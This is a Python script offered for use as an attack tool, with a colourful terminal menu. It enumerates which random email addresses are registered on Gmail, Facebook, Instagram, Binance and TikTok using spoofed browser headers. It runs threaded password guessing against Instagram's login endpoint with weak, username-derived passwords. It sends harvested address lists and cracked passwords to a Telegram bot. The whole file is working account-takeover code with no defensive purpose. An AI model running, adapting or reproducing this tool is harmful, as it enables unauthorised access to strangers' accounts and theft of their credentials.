# -*- coding: utf-8 -*-
# MOHA-02 MASTER SYSTEM V5.0 - ULTIMATE INJECTION ENGINE
# Developer: Moha Al-Shalfawi (@m_oha_02)
# Device Emulation: OPPO A16k (Android 11) - Full Fingerprints
# Speed: 40 Threads Stable - Permanent Logging Enabled

import os
import sys
import time
import requests
import json
import random
import threading
import string
import subprocess
import re
from datetime import datetime
from concurrent.futures import ThreadPoolExecutor

# --- [ AUTO COMPONENT INSTALLER ] ---
try:
    from cfonts import render
    from colorama import Fore, Style, init
    import cloudscraper
    from bs4 import BeautifulSoup
except ImportError:
    os.system('pip install python-cfonts colorama requests beautifulsoup4 cloudscraper')
    from cfonts import render
    from colorama import Fore, Style, init
    import cloudscraper
    from bs4 import BeautifulSoup

init(autoreset=True)

# --- [ GLOBAL COLORS ] ---
Z = Fore.RED
F = Fore.GREEN
X = Fore.YELLOW
B = Fore.BLUE
M = Fore.MAGENTA
S = Fore.CYAN
W = Fore.WHITE
G = Fore.LIGHTBLACK_EX

# --- [ SYSTEM COUNTERS ] ---
hits = 0
bad = 0
stop_thread = False
ban_detected = False

# --- [ ADVANCED BROWSER DATABASE - FULL DATA ] ---
BROWSER_DB = [
    {
        'User-Agent': 'Mozilla/5.0 (Linux; Android 11; OPPO A16k Build/RP1A.200720.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/92.0.4515.131 Mobile Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8',
        'sec-ch-ua-platform': '"Android"',
        'X-Requested-With': 'com.google.android.gm'
    },
    {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'DNT': '1'
    },
    {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0 (Edition GX-Game)',
        'sec-ch-ua': '"Chromium";v="122", "Not(A:Brand";v="24", "Opera";v="108"',
        'X-Requested-With': 'XMLHttpRequest'
    },
    {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15',
        'Accept': '*/*',
        'Accept-Language': 'en-GB,en;q=0.9'
    }
]

# --- [ CORE UTILS ] ---
def logo():
    print(render('MOHA-02', colors=['green', 'yellow'], align='center'))
    print(f"{X}—"*55)
    print(f"{F} [•] DEVELOPER : @m_oha_02")
    print(f"{F} [•] VERSION   : 5.0 (ULTIMATE ALL-IN-ONE)")
    print(f"{F} [•] LOGGING   : PERMANENT (NO CLEAR)")
    print(f"{X}—"*55)

def get_random_headers(platform="default"):
    head = random.choice(BROWSER_DB).copy()
    if platform == "google":
        head.update({'X-Requested-With': 'com.google.android.gm'})
    elif platform == "fb_bypass":
        head.update({
            'Host': 'b-graph.facebook.com',
            'Content-Type': 'application/x-www-form-urlencoded'
        })
    return head

def log_result(email, info, token, chat_id, status="HIT"):
    now = datetime.now().strftime("%H:%M:%S")
    color = F if status == "HIT" or status == "CRACKED" else S
    
    # طباعة دائمة في تريمكس
    print(f"{color} [{status}] {W}{email} {X}⇉ {S}{info} {G}({now})")
    
    with open("moha_ultimate_hits.txt", "a") as f:
        f.write(f"[{status}] {email} | {info} | {now}\n")
    
    if token and chat_id:
        msg = (f"🔥 <b>MOHA-02 NEW {status}!</b>\n"
               f"━━━━━━━━━━━━━━━\n"
               f"📧 Email: <code>{email}</code>\n"
               f"🔗 Info: <code>{info}</code>\n"
               f"⏰ Time: {now}\n"
               f"👨‍💻 Dev: @m_oha_02")
        try:
            requests.post(f"https://api.telegram.org/bot{token}/sendMessage", 
                          json={"chat_id": chat_id, "text": msg, "parse_mode": "HTML"})
        except: pass

# --- [ CHECKERS ENGINE ] ---
class Checkers:
    @staticmethod
    def fb_bypass(email):
        url = 'https://b-graph.facebook.com/recover_accounts'
        data = {
            'q': email, 'locale': 'en_US', 'method': 'GET',
            'access_token': '350685531728|62f8ce9f74b12f84c123cc23437a4a32'
        }
        try:
            r = requests.post(url, headers=get_random_headers("fb_bypass"), data=data, timeout=7)
            return True if "network_info" in r.text else False
        except: return False

    @staticmethod
    def check_gmail(email):
        url = f"https://mail.google.com/mail/gxlu?email={email}"
        try:
            sess = requests.Session()
            r = sess.get(url, headers=get_random_headers("google"), timeout=10)
            if r.status_code in [403, 429]: return "BAN"
            return False if 'COMPASS' in (str(sess.cookies.get_dict()) + str(r.headers)) else True
        except: return "ERROR"

    @staticmethod
    def instagram(email):
        url = 'https://www.instagram.com/api/v1/web/accounts/lookup_edit/'
        head = get_random_headers()
        head.update({'X-CSRFToken': 'en79t6vU1hN2zX1a2b3c4d5e', 'X-Requested-With': 'XMLHttpRequest'})
        try:
            r = requests.post(url, headers=head, data={'email': email}, timeout=8)
            return True if '"status":"ok"' in r.text else False
        except: return False

    @staticmethod
    def binance(email):
        url = "https://www.binance.com/bapi/composite/v1/public/cms/get-email-status"
        try:
            r = requests.post(url, json={"email": email}, headers=get_random_headers(), timeout=7)
            return True if r.json().get('data') == True else False
        except: return False

    @staticmethod
    def tiktok(email):
        url = "https://www.tiktok.com/api/v1/check/email/"
        try:
            r = requests.get(url, params={"email": email, "aid": "1233"}, headers=get_random_headers(), timeout=7)
            return True if r.json().get('is_registered') else False
        except: return False

# --- [ OPTION 1: HUNTING ENGINE ] ---
def start_hunting():
    global hits, bad, stop_thread, ban_detected
    logo()
    print(f"{S} [ SELECT PLATFORMS ]")
    print(f"{F} [1] Instagram  [2] TikTok  [3] Facebook  [4] Binance")
    print(f"{F} [5] Snapchat   [6] Netflix [7] EpicGames [12] ALL")
    p_choice = input(f"{M} [?] YOUR CHOICE: ")
    
    print(f"\n{S} [ SELECT DOMAIN ]")
    print(f"{F} [1] gmail.com [2] mail.ru [3] hotmail.com")
    d_choice = input(f"{M} [?] CHOICE: ")
    d_map = {'1': 'gmail.com', '2': 'mail.ru', '3': 'hotmail.com'}
    dom = d_map.get(d_choice, 'gmail.com')
    
    prefix = input(f"{M} [?] STARTING LETTERS (OR ENTER): ")
    length = int(input(f"{M} [?] USER LENGTH (ex: 8): ") or 8)
    token = input(f"{M} [?] BOT TOKEN: ")
    chat_id = input(f"{M} [?] CHAT ID: ")

    def engine():
        global hits, bad, ban_detected
        while not stop_thread:
            if ban_detected: time.sleep(5); continue
            user = prefix + ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(max(1, length-len(prefix))))
            email = f"{user}@{dom}"
            
            check = Checkers.check_gmail(email)
            if check == "BAN":
                ban_detected = True
                print(f"\n{Z} [!!!] IP BAN DETECTED. CHANGE IP NOW.")
                return

            if check == True: # Available
                log_result(email, "Available Email", token, chat_id, "AVAILABLE")
                hits += 1
            elif check == False: # Registered
                linked = []
                if Checkers.fb_bypass(email): linked.append("Facebook")
                if '1' in p_choice or '12' in p_choice:
                    if Checkers.instagram(email): linked.append("Instagram")
                if '4' in p_choice or '12' in p_choice:
                    if Checkers.binance(email): linked.append("Binance")
                
                if linked:
                    log_result(email, " & ".join(linked), token, chat_id, "HIT")
                    hits += 1
                else: bad += 1
            sys.stdout.write(f"\r{W} [SCAN] {F}HITS: {hits} {Z}BAD: {bad} {X}TRG: {email} "); sys.stdout.flush()

    for _ in range(40): threading.Thread(target=engine).start()
    input(f"\n{X} [*] RUNNING... PRESS ENTER TO RETURN TO MENU\n")
    stop_thread = True

# --- [ OPTION 2: LIST GENERATOR ] ---
def list_generator():
    logo()
    print(f"{F} [01] Registered (Live) [02] Available (Hunt)")
    type_ch = input(f"{M} [?] SELECT TYPE: ")
    prefix = input(f"{M} [?] ENTER PREFIX: ")
    count = int(input(f"{M} [?] COUNT: "))
    token = input(f"{M} [?] BOT TOKEN: ")
    chat_id = input(f"{M} [?] CHAT ID: ")
    
    file_name = f"list_{random.randint(100,999)}.txt"
    found = 0
    with open(file_name, 'w') as f:
        while found < count:
            l_rand = random.randint(6, 10)
            user = prefix + ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(l_rand-len(prefix)))
            email = f"{user}@gmail.com"
            check = Checkers.check_gmail(email)
            is_valid = (not check) if type_ch == '01' else check
            if is_valid:
                f.write(f"{email}\n"); f.flush()
                found += 1
                print(f"{F} [✔] COLLECTED: {email} ({found}/{count})")
    
    print(f"\n{F} [DONE] Saved to {file_name}")
    # إرسال الملف للتليجرام
    try:
        requests.post(f"https://api.telegram.org/bot{token}/sendDocument", 
                      data={'chat_id': chat_id}, files={'document': open(file_name, 'rb')})
    except: pass

# --- [ OPTION 3: BRUTE FORCE FROM FILE ] ---
def brute_file():
    logo()
    path = input(f"{M} [?] FILE PATH: ")
    if not os.path.exists(path): return
    
    print(f"{F} [1] Manual Passwords  [2] Auto-Smart Passwords")
    p_mode = input(f"{M} [?] CHOICE: ")
    passwords = []
    if p_mode == '1':
        p_num = int(input(f"{M} [?] HOW MANY PASSWORDS?: "))
        for i in range(p_num): passwords.append(input(f" [?] PASS {i+1}: "))
    
    token = input(f"{M} [?] BOT TOKEN: ")
    chat_id = input(f"{M} [?] CHAT ID: ")
    
    with open(path, 'r') as f: accounts = f.read().splitlines()

    def worker(acc):
        email = acc.split(':')[0]
        u_part = email.split('@')[0]
        # استخدام كلمات سر مخصصة أو تلقائية ذكية حسب طلبك
        c_pass = passwords if p_mode == '1' else [u_part, u_part+"123", u_part+"2024", u_part+"1122", "12345678"]
        
        for pwd in c_pass:
            sys.stdout.write(f"\r{G} [TRYING] {email} ⇉ {pwd} "); sys.stdout.flush()
            try:
                head = get_random_headers()
                res = requests.post("https://www.instagram.com/api/v1/web/accounts/login/ajax/", 
                                 data={'username': email, 'enc_password': f'#PWD_INSTAGRAM_BROWSER:0:{int(time.time())}:{pwd}'}, 
                                 headers=head, timeout=10)
                if '"authenticated":true' in res.text:
                    log_result(email, f"Password: {pwd}", token, chat_id, "CRACKED")
                    break
            except: pass

    with ThreadPoolExecutor(max_workers=20) as ex: ex.map(worker, accounts)

# --- [ MAIN ] ---
def main():
    while True:
        global stop_thread, ban_detected; stop_thread = False; ban_detected = False
        logo()
        print(f"{S} [01] START HUNTING (All Platforms)")
        print(f"{S} [02] SMART LIST GENERATOR (Auto-Length)")
        print(f"{S} [03] BRUTE FORCE FROM FILE")
        print(f"{Z} [00] EXIT")
        choice = input(f"{M} [?] OPTION: ")
        
        if choice == '01': start_hunting()
        elif choice == '02': list_generator()
        elif choice == '03': brute_file()
        elif choice == '00': break

if __name__ == "__main__":
    main()
